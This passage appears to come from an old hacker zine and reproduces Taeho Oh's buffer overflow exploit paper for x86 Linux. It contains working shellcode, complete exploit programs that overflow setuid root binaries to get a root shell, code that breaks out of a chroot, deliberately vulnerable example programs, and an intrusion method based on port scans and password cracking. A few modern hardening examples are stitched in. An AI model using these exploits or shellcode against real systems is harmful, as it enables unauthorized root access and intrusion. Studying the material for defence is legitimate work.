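    printf("%zu A records, %zu unexpected, %zu private\n",
           r.records, r.unexpected, r.private_addr);
    return 0;
}
```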

      Using strobe to perform port scans on these external machines, we can note 
      any and all system services that can be reached for possible exploitation. 
      If we are successful at breaking into any of these machines on the outside       
      of the firewall, we make note of all valid user names in the password file 
      and see if there are any machines mentioned in the hosts file that weren't 
      listed in our DNS maps. 

      If we obtain "super-user" access, we run crack, a Unix-based password 
      decoder, on the shadowed password file, in anticipation that these same 
      logins and passwords also exist on other machines. We've found that crack       
      does some rather extensive dictionary attacks on people's encrypted 
      passwords and generally has a high rate of success. In some cases, the 
      password file isn't even shadowed, and super-user access isn't required to 
      get at the encrypted passwords. 

      @HWA 
      
34.0  Advanced buffer overflow exploit Written by Taeho Oh
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by Taeho Oh     
      
      -------------------------------------------------------------------------------
      -------------------------------------------------------------------------------
      -------------------------------------------------------------------------------
      
      
      
       Advanced buffer overflow exploit
      
      
       Written by Taeho Oh ( ohhara@postech.edu )
      ----------------------------------------------------------------------------
      Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
      PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
      PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
      ----------------------------------------------------------------------------
      
      
      1. Introduction
       Nowadays there are many buffer overflow exploit codes. The early buffer
      overflow exploit codes only spawn a shell ( execute /bin/sh ). However,
      nowadays some of the buffer overflow exploit codes have very nice features,
      for example, passing through filtering, opening a socket, breaking chroot,
      and so on. This paper will attempt to explain advanced buffer overflow
      exploit techniques under Intel x86 Linux.
      
      2. What do you have to know before reading?
       You have to know assembly language, C language, and Linux. Of course, you
      have to know what a buffer overflow is. You can get information about
      buffer overflows in Phrack 49-14 ( Smashing The Stack For Fun And Profit
      by Aleph1 ). It is a wonderful paper on buffer overflows and I highly
      recommend that you read it before reading this one.
      
      3. Pass through filtering
       There are many programs which have buffer overflow problems. Why are not
      all buffer overflow problems exploited? Because even if a program has a buffer
      overflow condition, it can be hard to exploit. In many cases, the reason is
      that the program filters some characters or converts characters into other
      characters. If the program filters all non-printable characters, it's too
      hard to exploit. If the program filters only some characters, you can pass
      through the filter by making good buffer overflow exploit code. :)
      
      3.1 The example vulnerable program
      
      vulnerable1.c
      ----------------------------------------------------------------------------
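      #include<string.h>
      #include<ctype.h>
      
      int main(int argc,char **argv)
      {
      char buffer[1024];
      int i;
      if(argc>1)
      {
      /* the "filter": small letters become capital letters */
      for(i=0;i<strlen(argv[1]);i++)
      argv[1][i]=toupper(argv[1][i]);
      /* deliberately unchecked copy: argv[1] may exceed buffer */
      strcpy(buffer,argv[1]);
      }
      }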
      ----------------------------------------------------------------------------
      
       This vulnerable program converts the small letters of the user input into
      capital letters. Therefore, you have to make a shellcode which doesn't contain
      any small letters. How can you do that? You have to reference the character
      string "/bin/sh", which must contain small letters. However, you can exploit
      this. :)
      
      3.2 Modify the normal shellcode
       Almost all buffer overflow exploit code uses this shellcode. Now you have
      to remove all small letters in the shellcode. Of course, the new shellcode
      has to execute a shell.
      
      normal shellcode
      ----------------------------------------------------------------------------
      char shellcode[]=
      "\xeb\x1f"                      /* jmp 0x1f              */
      "\x5e"                          /* popl %esi             */
      "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xd8"                      /* movl %ebx,%eax        */
      "\x40"                          /* inc %eax              */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\xdc\xff\xff\xff"          /* call -0x24            */
      "/bin/sh";                      /* .string \"/bin/sh\"   */
      ----------------------------------------------------------------------------
      
       This shellcode has 6 small letters ( 5 small letters in "/bin/sh" and
      1 small letter in "movl %esi,0x8(%esi)" ).
       You cannot use the "/bin/sh" character string directly to pass through the
      filter. However, you can insert any characters except small letters.
      Therefore, you can insert "\x2f\x12\x19\x1e\x2f\x23\x18" instead of
      "\x2f\x62\x69\x6e\x2f\x73\x68" ( "/bin/sh" ). After you overflow the buffer,
      you have to change "\x2f\x12\x19\x1e\x2f\x23\x18" into
      "\x2f\x62\x69\x6e\x2f\x73\x68" to execute "/bin/sh". You can change it easily
      by adding \x50 to the disguised bytes, which restores \x62, \x69, \x6e,
      \x73, and \x68, when your shellcode is executed. Then how can you hide \x76
      in "movl %esi,0x8(%esi)"? You can change "movl %esi,0x8(%esi)" into other
      instructions that do the equivalent operation and do not contain any small
      letters. For example, "movl %esi,0x8(%esi)" can be changed into
      "movl %esi,%eax", "addl $0x8,%eax", "movl %eax,0x8(%esi)". The changed
      instructions do not have any small letters. ( I think there are other good
      instructions that do the same thing. It's just an example. )
      Now the new shellcode is made.
      
      new shellcode
      ----------------------------------------------------------------------------
      char shellcode[]=
      "\xeb\x38"                      /* jmp 0x38              */
      "\x5e"                          /* popl %esi             */
      "\x80\x46\x01\x50"              /* addb $0x50,0x1(%esi)  */
      "\x80\x46\x02\x50"              /* addb $0x50,0x2(%esi)  */
      "\x80\x46\x03\x50"              /* addb $0x50,0x3(%esi)  */
      "\x80\x46\x05\x50"              /* addb $0x50,0x5(%esi)  */
      "\x80\x46\x06\x50"              /* addb $0x50,0x6(%esi)  */
      "\x89\xf0"                      /* movl %esi,%eax        */
      "\x83\xc0\x08"                  /* addl $0x8,%eax        */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xd8"                      /* movl %ebx,%eax        */
      "\x40"                          /* inc %eax              */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\xc3\xff\xff\xff"          /* call -0x3d            */
      "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh"     */
                                      /* /bin/sh is disguised  */
      ----------------------------------------------------------------------------
      
      3.3 Exploit vulnerable1 program
      
       With this shellcode, you can make an exploit code easily.
      
      exploit1.c
      ----------------------------------------------------------------------------
      #include<stdio.h>
      #include<stdlib.h>
      #include<string.h>
      #include<unistd.h>
      
      #define ALIGN                             0
      #define OFFSET                            0
      #define RET_POSITION                   1024
      #define RANGE                            20
      #define NOP                            0x90
      
      char shellcode[]=
      "\xeb\x38"                      /* jmp 0x38              */
      "\x5e"                          /* popl %esi             */
      "\x80\x46\x01\x50"              /* addb $0x50,0x1(%esi)  */
      "\x80\x46\x02\x50"              /* addb $0x50,0x2(%esi)  */
      "\x80\x46\x03\x50"              /* addb $0x50,0x3(%esi)  */
      "\x80\x46\x05\x50"              /* addb $0x50,0x5(%esi)  */
      "\x80\x46\x06\x50"              /* addb $0x50,0x6(%esi)  */
      "\x89\xf0"                      /* movl %esi,%eax        */
      "\x83\xc0\x08"                  /* addl $0x8,%eax        */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xd8"                      /* movl %ebx,%eax        */
      "\x40"                          /* inc %eax              */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\xc3\xff\xff\xff"          /* call -0x3d            */
      "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh"     */
                                      /* /bin/sh is disguised  */
      
      unsigned long get_sp(void)
      {
      __asm__("movl %esp,%eax");
      }
      
      int main(int argc,char **argv)
      {
      char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
      long addr;
      unsigned long sp;
      int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
      int i;
      
      if(argc>1)
      offset=atoi(argv[1]);
      
      sp=get_sp();
      addr=sp-offset;
      
      for(i=0;i<bsize;i+=4)
      {
      buff[i+ALIGN]=(addr&0x000000ff);
      buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
      buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
      buff[i+ALIGN+3]=(addr&0xff000000)>>24;
      }
      
      for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)
      buff[i]=NOP;
      
      ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
      for(i=0;i<strlen(shellcode);i++)
      *(ptr++)=shellcode[i];
      
      buff[bsize-1]='\0';
      
      printf("Jump to 0x%08x\n",addr);
      
      execl("./vulnerable1","vulnerable1",buff,0);
      }
      ----------------------------------------------------------------------------
      
      exploit the vulnerable1 program
      ----------------------------------------------------------------------------
      [ ohhara@ohhara ~ ] {1} $ ls -l vulnerable1
      -rwsr-xr-x   1 root     root         4342 Oct 18 13:20 vulnerable1*
      [ ohhara@ohhara ~ ] {2} $ ls -l exploit1
      -rwxr-xr-x   1 ohhara   cse          6932 Oct 18 13:20 exploit1*
      [ ohhara@ohhara ~ ] {3} $ ./exploit1
      Jump to 0xbfffec64
      Segmentation fault
      [ ohhara@ohhara ~ ] {4} $ ./exploit1 500
      Jump to 0xbfffea70
      bash# whoami
      root
      bash#
      ----------------------------------------------------------------------------
      
      3.4 What can you do with this technique?
       You can pass through various forms of filters with this technique. When the
      vulnerable program filters !@#$%^&*(), you can make a new shellcode which
      doesn't contain !@#$%^&*(). However, you will have difficulties in making a
      shellcode if the program filters many characters.
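
      Seen from the defender's side, section 3 shows that filtering
      characters does not remove the overflow; bounding the copy does. The
      hardened counterpart to vulnerable1.c below is an added example, not
      code from Taeho Oh's paper; upper_copy() and handle_argument() are
      names invented here.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUFFER_SIZE 1024   /* same size as buffer[] in vulnerable1.c */

/* Upper-case src into dst. Returns 0 on success and -1 when src plus its
 * terminating NUL does not fit in dstsz bytes. On failure dst is left as an
 * empty string: over-long input is rejected, never silently truncated. */
int upper_copy(char *dst, size_t dstsz, const char *src)
{
    const char *nul;
    size_t len;

    if (dst == NULL || dstsz == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;

    /* Look for the terminator inside the first dstsz bytes only, so the
     * length check itself never depends on how long the input is. */
    nul = memchr(src, '\0', dstsz);
    if (nul == NULL)
        return -1;
    len = (size_t)(nul - src);

    /* toupper() needs an unsigned char value; a plain char above 0x7f may
     * be negative, which is undefined behaviour in the original loop. */
    for (size_t i = 0; i < len; i++)
        dst[i] = (char)toupper((unsigned char)src[i]);
    dst[len] = '\0';
    return 0;
}

/* The body of vulnerable1.c's main() rebuilt on upper_copy(). The caller's
 * argv string is no longer modified in place. */
int handle_argument(const char *arg)
{
    char buffer[BUFFER_SIZE];

    if (upper_copy(buffer, sizeof buffer, arg) != 0) {
        fprintf(stderr, "argument longer than %d bytes, rejected\n",
                BUFFER_SIZE - 1);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}

int main(int argc, char **argv)
{
    return argc > 1 ? handle_argument(argv[1]) : 0;
}
```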
      
      4 Change uid back to 0
       A setuid root program which knows that working with root permission is very
      dangerous calls seteuid(getuid()) at start, and it calls seteuid(0) when root
      is needed. Many programmers think that it's safe after calling
      seteuid(getuid()). However, it's not true. The uid can be changed back to 0.
      
      4.1 The example vulnerable program
      
      vulnerable2.c
      ----------------------------------------------------------------------------
      #include<string.h>
      #include<unistd.h>
      
      int main(int argc,char **argv)
      {
      char buffer[1024];
      seteuid(getuid());
      if(argc>1)
      strcpy(buffer,argv[1]);
      }
      ----------------------------------------------------------------------------
      
       This vulnerable program calls seteuid(getuid()) at start. Therefore, you
      may think that "strcpy(buffer,argv[1]);" is OK, because you can only get
      your own shell even if you succeed in a buffer overflow attack. However,
      if you insert code which calls setuid(0) into the shellcode, you can get
      a root shell. :)
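
      seteuid(getuid()) changes only the effective uid; root stays in the
      saved set-user-ID, which is why setuid(0) succeeds afterwards. The
      added example below (not part of the original paper) gives up all
      three ids and verifies that root cannot be regained. It assumes Linux
      with glibc (setresuid/getresuid); the function names are invented here.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE            /* glibc: exposes setresuid() and friends */
#endif
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Repeated so the example also builds when _GNU_SOURCE came too late. */
int setresuid(uid_t ruid, uid_t euid, uid_t suid);
int setresgid(gid_t rgid, gid_t egid, gid_t sgid);
int getresuid(uid_t *ruid, uid_t *euid, uid_t *suid);
int getresgid(gid_t *rgid, gid_t *egid, gid_t *sgid);

/* The pattern used by vulnerable2.c. Returns 1 when another uid is still
 * parked in the saved set-user-ID afterwards (so it can be brought back),
 * 0 when nothing is left, -1 on error. */
int temporary_drop_leaves_saved_uid(void)
{
    uid_t r, e, s;

    if (seteuid(getuid()) != 0 || getresuid(&r, &e, &s) != 0)
        return -1;
    return s != r;
}

/* Permanent drop to the invoking user: real, effective and saved ids are
 * all set, then read back. Returns 0 only when the drop is verified; a
 * caller should abort on any other value rather than continue. */
int drop_privileges_permanently(void)
{
    uid_t uid = getuid(), r, e, s;
    gid_t gid = getgid(), rg, eg, sg;

    /* Group ids first: after the uid change this may no longer be allowed. */
    if (setresgid(gid, gid, gid) != 0 || setresuid(uid, uid, uid) != 0)
        return -1;
    if (getresgid(&rg, &eg, &sg) != 0 || rg != gid || eg != gid || sg != gid)
        return -1;
    if (getresuid(&r, &e, &s) != 0 || r != uid || e != uid || s != uid)
        return -1;
    /* For a non-root user, becoming uid 0 again must now fail. */
    if (uid != 0 && (setuid(0) == 0 || seteuid(0) == 0))
        return -1;
    return 0;
}

static void show_ids(const char *label)
{
    uid_t r = 0, e = 0, s = 0;

    if (getresuid(&r, &e, &s) == 0)
        printf("%-26s real=%lu effective=%lu saved=%lu\n", label,
               (unsigned long)r, (unsigned long)e, (unsigned long)s);
}

int main(void)
{
    int left;

    show_ids("at start");
    left = temporary_drop_leaves_saved_uid();
    show_ids("after seteuid(getuid())");
    printf("saved uid still differs from real uid: %d\n", left);

    if (drop_privileges_permanently() != 0) {
        fprintf(stderr, "could not drop privileges, aborting\n");
        return 1;
    }
    show_ids("after permanent drop");
    return 0;
}
```

      Installed setuid root and run by an ordinary user, the second line of
      output shows saved=0 after seteuid(getuid()); after the permanent drop
      all three ids are the user's own.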
      
      4.2 Make setuid(0) code
      
      setuidasm.c
      ----------------------------------------------------------------------------
      #include<unistd.h>
      
      int main()
      {
      setuid(0);
      }
      ----------------------------------------------------------------------------
      
      compile and disassemble
      ----------------------------------------------------------------------------
      [ ohhara@ohhara ~ ] {1} $ gcc -o setuidasm -static setuidasm.c
      [ ohhara@ohhara ~ ] {2} $ gdb setuidasm
      GNU gdb 4.17
      Copyright 1998 Free Software Foundation, Inc.
      GDB is free software, covered by the GNU General Public License, and you are
      welcome to change it and/or distribute copies of it under certain conditions.
      Type "show copying" to see the conditions.
      There is absolutely no warranty for GDB.  Type "show warranty" for details.
      This GDB was configured as "i386-redhat-linux"...
      (gdb) disassemble setuid
      Dump of assembler code for function __setuid:
      0x804ca00 <__setuid>:   movl   %ebx,%edx
      0x804ca02 <__setuid+2>: movl   0x4(%esp,1),%ebx
      0x804ca06 <__setuid+6>: movl   $0x17,%eax
      0x804ca0b <__setuid+11>:        int    $0x80
      0x804ca0d <__setuid+13>:        movl   %edx,%ebx
      0x804ca0f <__setuid+15>:        cmpl   $0xfffff001,%eax
      0x804ca14 <__setuid+20>:        jae    0x804cc10 <__syscall_error>
      0x804ca1a <__setuid+26>:        ret    
      0x804ca1b <__setuid+27>:        nop    
      0x804ca1c <__setuid+28>:        nop    
      0x804ca1d <__setuid+29>:        nop    
      0x804ca1e <__setuid+30>:        nop    
      0x804ca1f <__setuid+31>:        nop    
      End of assembler dump.
      (gdb)
      ----------------------------------------------------------------------------
      
      setuid(0); code
      ----------------------------------------------------------------------------
      char code[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\xb0\x17"                      /* movb $0x17,%al        */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      4.3 Modify the normal shellcode
      
       Making the new shellcode is very easy once you have the setuid(0) code.
      Just insert the code at the start of the normal shellcode.
      
      new shellcode
      ----------------------------------------------------------------------------
      char shellcode[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\xb0\x17"                      /* movb $0x17,%al        */
      "\xcd\x80"                      /* int $0x80             */
      "\xeb\x1f"                      /* jmp 0x1f              */
      "\x5e"                          /* popl %esi             */
      "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xd8"                      /* movl %ebx,%eax        */
      "\x40"                          /* inc %eax              */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\xdc\xff\xff\xff"          /* call -0x24            */
      "/bin/sh";                      /* .string \"/bin/sh\"   */
      ----------------------------------------------------------------------------
      
      4.4 Exploit vulnerable2 program
      
       With this shellcode, you can make an exploit code easily.
      
      exploit2.c
      ----------------------------------------------------------------------------
      #include<stdio.h>
      #include<stdlib.h>
      #include<string.h>
      #include<unistd.h>
      
      #define ALIGN                             0
      #define OFFSET                            0
      #define RET_POSITION                   1024
      #define RANGE                            20
      #define NOP                            0x90
      
      char shellcode[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\xb0\x17"                      /* movb $0x17,%al        */
      "\xcd\x80"                      /* int $0x80             */
      "\xeb\x1f"                      /* jmp 0x1f              */
      "\x5e"                          /* popl %esi             */
      "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xd8"                      /* movl %ebx,%eax        */
      "\x40"                          /* inc %eax              */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\xdc\xff\xff\xff"          /* call -0x24            */
      "/bin/sh";                      /* .string \"/bin/sh\"   */
      
      unsigned long get_sp(void)
      {
      __asm__("movl %esp,%eax");
      }
      
      void main(int argc,char **argv)
      {
      char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
      long addr;
      unsigned long sp;
      int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
      int i;
      
      if(argc>1)
      offset=atoi(argv[1]);
      
      sp=get_sp();
      addr=sp-offset;
      
      for(i=0;i<bsize;i+=4)
      {
      buff[i+ALIGN]=(addr&0x000000ff);
      buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
      buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
      buff[i+ALIGN+3]=(addr&0xff000000)>>24;
      }
      
      for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)
      buff[i]=NOP;
      
      ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
      for(i=0;i<strlen(shellcode);i++)
      *(ptr++)=shellcode[i];
      
      buff[bsize-1]='\0';
      
      printf("Jump to 0x%08x\n",addr);
      
      execl("./vulnerable2","vulnerable2",buff,0);
      }
      ----------------------------------------------------------------------------
      
      exploit the vulnerable2 program
      ----------------------------------------------------------------------------
      [ ohhara@ohhara ~ ] {1} $ ls -l vulnerable2
      -rwsr-xr-x   1 root     root         4258 Oct 18 14:16 vulnerable2*
      [ ohhara@ohhara ~ ] {2} $ ls -l exploit2
      -rwxr-xr-x   1 ohhara   cse          6932 Oct 18 14:26 exploit2*
      [ ohhara@ohhara ~ ] {3} $ ./exploit2
      Jump to 0xbfffec64
      Illegal instruction
      [ ohhara@ohhara ~ ] {4} $ ./exploit2 500
      Jump to 0xbfffea70
      bash# whoami
      root
      bash#
      ----------------------------------------------------------------------------
      
      4.5 What can you do with this technique?
       You attack a setuid root program with a buffer overflow, but you only get
      your own shell. You can use this technique in that situation.
      
      5 Break chroot
       If the setuid root program is chrooted, you can access only the chrooted
      directory. You cannot access the root directory. However, you can access all
      directories if your shellcode changes the root directory back to "/". :)
      
      5.1 The example vulnerable program
      
      vulnerable3.c
      ----------------------------------------------------------------------------
      #include<string.h>
      #include<unistd.h>
      
      int main(int argc,char **argv)
      {
      char buffer[1024];
      chroot("/home/ftp");
      chdir("/");
      if(argc>1)
      strcpy(buffer,argv[1]);
      }
      ----------------------------------------------------------------------------
      
       If you try to execute "/bin/sh" with a buffer overflow, it may execute
      "/home/ftp/bin/sh" ( if it exists ) and you cannot access any directory
      other than "/home/ftp".
      
      5.2 Make break chroot code
       If you can execute the code below, you can break out of the chroot.
      
      breakchrootasm.c
      ----------------------------------------------------------------------------
      main()
      {
      mkdir("sh",0755);
      chroot("sh");
      /* many "../" */
      chroot("../../../../../../../../../../../../../../../../");
      }
      ----------------------------------------------------------------------------
      
       This break chroot code creates a directory named "sh", because that name is
      easy to reference. ( It is also used to execute "/bin/sh". )
      
      compile and disassemble
      ----------------------------------------------------------------------------
      [ ohhara@ohhara ~ ] {1} $ gcc -o breakchrootasm -static breakchrootasm.c
      [ ohhara@ohhara ~ ] {2} $ gdb breakchrootasm
      GNU gdb 4.17
      Copyright 1998 Free Software Foundation, Inc.
      GDB is free software, covered by the GNU General Public License, and you are
      welcome to change it and/or distribute copies of it under certain conditions.
      Type "show copying" to see the conditions.
      There is absolutely no warranty for GDB.  Type "show warranty" for details.
      This GDB was configured as "i386-redhat-linux"...
      (gdb) disassemble mkdir
      Dump of assembler code for function __mkdir:
      0x804cac0 <__mkdir>:    movl   %ebx,%edx
      0x804cac2 <__mkdir+2>:  movl   0x8(%esp,1),%ecx
      0x804cac6 <__mkdir+6>:  movl   0x4(%esp,1),%ebx
      0x804caca <__mkdir+10>: movl   $0x27,%eax
      0x804cacf <__mkdir+15>: int    $0x80
      0x804cad1 <__mkdir+17>: movl   %edx,%ebx
      0x804cad3 <__mkdir+19>: cmpl   $0xfffff001,%eax
      0x804cad8 <__mkdir+24>: jae    0x804cc40 <__syscall_error>
      0x804cade <__mkdir+30>: ret    
      0x804cadf <__mkdir+31>: nop    
      End of assembler dump.
      (gdb) disassemble chroot
      Dump of assembler code for function chroot:
      0x804cb60 <chroot>:     movl   %ebx,%edx
      0x804cb62 <chroot+2>:   movl   0x4(%esp,1),%ebx
      0x804cb66 <chroot+6>:   movl   $0x3d,%eax
      0x804cb6b <chroot+11>:  int    $0x80
      0x804cb6d <chroot+13>:  movl   %edx,%ebx
      0x804cb6f <chroot+15>:  cmpl   $0xfffff001,%eax
      0x804cb74 <chroot+20>:  jae    0x804cc40 <__syscall_error>
      0x804cb7a <chroot+26>:  ret    
      0x804cb7b <chroot+27>:  nop    
      0x804cb7c <chroot+28>:  nop    
      0x804cb7d <chroot+29>:  nop    
      0x804cb7e <chroot+30>:  nop    
      0x804cb7f <chroot+31>:  nop    
      End of assembler dump.
      (gdb)
      ----------------------------------------------------------------------------
      
      mkdir("sh",0755); code
      ----------------------------------------------------------------------------
      /* mkdir first argument is %ebx and second argument is   */
      /* %ecx.                                                 */
      char code[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\xb0\x27"                      /* movb $0x27,%al        */
      "\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
      /* %esi has to reference "/bin/sh" before using this     */
      /* instruction. This instruction loads the address of    */
      /* "sh" and stores it in %ebx.                           */
      "\xfe\xc5"                      /* incb %ch              */
      /* %cx = 0000 0001 0000 0000                             */
      "\xb1\xed"                      /* movb $0xed,%cl        */
      /* %cx = 0000 0001 1110 1101                             */
      /* %cx = 000 111 101 101                                 */
      /* %cx = 0   7   5   5                                   */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      chroot("sh"); code
      ----------------------------------------------------------------------------
      /* chroot first argument is ebx */
      char code[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
      "\xb0\x3d"                      /* movb $0x3d,%al        */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      chroot("../../../../../../../../../../../../../../../../"); code
      ----------------------------------------------------------------------------
      char code[]=
      "\xbb\xd2\xd1\xd0\xff"          /* movl $0xffd0d1d2,%ebx */
      /* disguised "../" character string                      */
      "\xf7\xdb"                      /* negl %ebx             */
      /* %ebx = $0x002f2e2e                                    */
      /* intel x86 is little endian.                           */
      /* %ebx = "../"                                          */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\xb1\x10"                      /* movb $0x10,%cl        */
      /* prepare for looping 16 times.                         */
      "\x56"                          /* pushl %esi            */
      /* backup current %esi. %esi has the pointer of          */
      /* "/bin/sh".                                            */
      "\x01\xce"                      /* addl %ecx,%esi        */
      "\x89\x1e"                      /* movl %ebx,(%esi)      */
      "\x83\xc6\x03"                  /* addl $0x3,%esi        */
      "\xe0\xf9"                      /* loopne -0x7           */
      /* make "../../../../ . . . " character string at        */
      /* 0x10(%esi) by looping.                                */
      "\x5e"                          /* popl %esi             */
      /* restore %esi.                                         */
      "\xb0\x3d"                      /* movb $0x3d,%al        */
      "\x8d\x5e\x10"                  /* leal 0x10(%esi),%ebx  */
      /* %ebx has the address of "../../../../ . . . ".        */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      5.3 Modify the normal shellcode
      
       Making the new shellcode is very easy once you have the break chroot code.
      Just insert that code at the start of the normal shellcode and adjust the
      jmp and call arguments.
      
      new shellcode
      ----------------------------------------------------------------------------
      char shellcode[]=
      "\xeb\x4f"                      /* jmp 0x4f              */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\x5e"                          /* popl %esi             */
      "\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
      "\xb0\x27"                      /* movb $0x27,%al        */
      "\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
      "\xfe\xc5"                      /* incb %ch              */
      "\xb1\xed"                      /* movb $0xed,%cl        */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
      "\xb0\x3d"                      /* movb $0x3d,%al        */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\xbb\xd2\xd1\xd0\xff"          /* movl $0xffd0d1d2,%ebx */
      "\xf7\xdb"                      /* negl %ebx             */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\xb1\x10"                      /* movb $0x10,%cl        */
      "\x56"                          /* pushl %esi            */
      "\x01\xce"                      /* addl %ecx,%esi        */
      "\x89\x1e"                      /* movl %ebx,(%esi)      */
      "\x83\xc6\x03"                  /* addl $0x3,%esi        */
      "\xe0\xf9"                      /* loopne -0x7           */
      "\x5e"                          /* popl %esi             */
      "\xb0\x3d"                      /* movb $0x3d,%al        */
      "\x8d\x5e\x10"                  /* leal 0x10(%esi),%ebx  */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\xac\xff\xff\xff"          /* call -0x54            */
      "/bin/sh";                      /* .string \"/bin/sh\"   */
